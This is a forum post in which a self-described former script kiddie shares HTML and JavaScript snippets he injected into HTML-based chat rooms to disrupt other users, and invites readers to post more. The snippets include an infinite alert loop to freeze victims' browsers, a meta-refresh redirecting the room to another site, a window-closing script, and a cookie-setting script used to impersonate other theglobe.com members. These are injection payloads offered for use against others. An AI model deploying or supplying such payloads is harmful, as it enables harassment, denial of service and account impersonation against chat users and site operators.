Back when I a little scripter kiddie. I made little java/html scripts to mess with people in html based chat rooms. Here are some of the scripts that I made.....
Punt Script:
This script punts a person offline...Code:<script language=javascript>var i=0; while( i < (i +2)){i +=1; alert ('Enter text here' +i) }</script>
Transport Script:
This script sends a the people in the chat room to an other web site...Code:<meta http-equiv="refresh" content=1;url="URL here"></meta>
Wondow Script:
This script will close the window that your in...Code:<script>window.close("")</script>
Alert Script:
This script will make a popup alert prompt...Code:<script>window.alert("Message here")</script>
Ghost Script:
This script I did not make... It was made for theglobe.com private rooms... It's a real cool code the will change you into any other globe member.... This script is one of the meny reasons why theglobe.com shut down......Code:<script>document.cookie="LAI=666";document. cookie="username="+prompt('username');ALERT(' OKAY')</SCRIPT>
If you made any cool javascript or html scripts back when you were a scripter kiddie feel free to post them on this thread....
System_0verload





Reply With Quote